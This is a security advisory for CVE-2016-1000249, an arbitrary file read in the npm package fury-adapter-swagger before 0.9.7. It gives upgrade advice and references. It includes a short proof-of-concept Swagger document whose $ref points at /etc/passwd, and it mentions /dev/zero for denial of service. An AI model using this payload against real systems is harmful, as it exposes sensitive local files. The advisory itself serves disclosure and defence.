High severityGHSA Advisory· Published Sep 1, 2020· Updated Sep 11, 2023
fury-adapter-swagger allows arbitrary file read from system
CVE-2016-1000249
Description
fury-adapter-swagger from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker to read arbitrary files off of the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like /dev/zero.
Proof of
Concept:
---
swagger: '2.0'
info:
title: Read local files
version: '1.0'
paths:
/foo:
get:
responses:
200:
description: Some description
examples:
text/html:
example:
$ref: '/etc/passwd'
Recommendation
Upgrade to version 0.9.7 or later.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
fury-adapter-swaggernpm | >= 0.2.0, < 0.9.7 | 0.9.7 |
Affected products
2- Range: >= 0.2.0, < 0.9.7
Patches
Vulnerability mechanics
References
6- github.com/advisories/GHSA-2r7f-4h2c-5x73ghsaADVISORY
- github.com/apiaryio/fury-adapter-swagger/commit/777e2d68f03546a88f3203bbd4725df8b1f662a7ghsaWEB
- github.com/apiaryio/fury-adapter-swagger/commit/f4407e3a5323bc31123d45dbc93b8417002e4d51ghsaWEB
- github.com/apiaryio/fury-adapter-swagger/pull/89ghsaWEB
- security.snyk.io/vuln/npm:fury-adapter-swagger:20161024ghsaWEB
- www.npmjs.com/advisories/305ghsaWEB
News mentions
0No linked articles in our index yet.